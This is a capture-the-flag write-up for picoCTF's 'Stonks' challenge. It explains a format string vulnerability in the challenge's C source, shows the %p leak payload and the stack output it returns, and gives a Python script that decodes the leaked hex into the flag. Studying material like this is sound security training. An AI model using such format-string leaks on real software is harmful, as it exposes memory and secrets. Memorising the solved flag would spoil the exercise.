Points: 20
Category: Binary Exploitation
I decided to try something noone else has before. I made a bot to automatically trade stonks for me using AI and machine learning. I wouldn't believe you if you told me it's unsecure! vuln.c
nc mercury.picoctf.net 33411
- Okay, maybe I'd believe you if you find my API key.
In the Source code, if you see carefully on buy_stock function, we can see this code snippet.
char *user_buf = malloc(300 + 1);
printf("What is your API token?\n");
scanf("%300s", user_buf);
printf("Buying stonks with token:\n");
printf(user_buf);what is this actually? It's called a format string vulnerabilities, what we input in that scanf will be returned to us, so If you input a specifier like %s, %d, %x, %por %n it will give us a return value of the specifier.
In Binary exploitation, a format string vulnerability usually use either %p or %x to leak some address, judjing by the source code, our fleak is UNIQUE so each player will have a different flag.
Knowing all this information, it's time to leak the first 50 stack values using %p and I use python3 to print 50 of that specifier.
Welcome back to the trading app!
What would you like to do?
1) Buy some stonks!
2) View my portfolio
1
Using patented AI algorithms to buy stonks
Stonks chosen
What is your API token?
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
Buying stonks with token:
0x844d3d00x804b0000x80489c30xf7f9cd800xffffffff0x10x844b1600xf7faa1100xf7f9cdc7(nil)0x844c1800x10x844d3b00x844d3d00x6f6369700x7b4654430x306c5f490x345f74350x6d5f6c6c0x306d5f790x5f79336e0x633432610x366134310xffcd007d0xf7fd7af80xf7faa4400xd7c723000x1(nil)0xf7e39ce90xf7fab0c00xf7f9c5c00xf7f9c0000xffcdcc480xf7e2a68d0xf7f9c5c00x8048eca0xffcdcc54(nil)0xf7fbef090x804b0000xf7f9c0000xf7f9ce200xffcdcc880xf7fc4d500xf7f9d8900xd7c723000xf7f9c0000x804b0000xffcdcc88
Portfolio as of Mon Apr 10 06:37:44 UTC 2023
1 shares of E
1 shares of TW
177 shares of LP
61 shares of SXEX
20 shares of JD
209 shares of MBUY
138 shares of AIQJ
Goodbye!It's a bunch of hex, don't worry cyber chef can tell us what they mean or you can just search for 7d as it's equal to }
We found this particular string to be interesing because it has 7d at the end and a 6f636970 or ocip.
6f6369700x7b4654430x306c5f490x345f74350x6d5f6c6c0x306d5f790x5f79336e0x633432610x366134317d
If you translate this into string, you'll found this
ocip{FTC0l_I4_t5m_ll0m_y_y3nc42a6a41}
See some pattern here? The flag format will always be picoCTF{.*} and if you see the result there, it looks like they swap the print every 4 character. What we can do is, we can separate this hex every 4 character and then print it backward or do it manual...
ocip -> pico
{FTC -> CTF{
0l_I -> I_l0
4_t5 -> 5t_4
m_ll -> ll_m
0m_y -> y_m0
_y3n -> n3y_
c42a -> a24c
6a41 -> 14a6
} -> }
I write a simple script too to do this using [::-1] and unhexlify
from binascii import unhexlify
flag = b"".join(
[
unhexlify("6f636970")[::-1],
unhexlify("7b465443")[::-1],
unhexlify("306c5f49")[::-1],
unhexlify("345f7435")[::-1],
unhexlify("6d5f6c6c")[::-1],
unhexlify("306d5f79")[::-1],
unhexlify("5f79336e")[::-1],
unhexlify("63343261")[::-1],
unhexlify("36613431")[::-1],
unhexlify("007d")[::-1],
]
).decode()
print(flag)picoCTF{I_l05t_4ll_my_m0n3y_a24c14a6}
NOTE: Every Player has a different flag!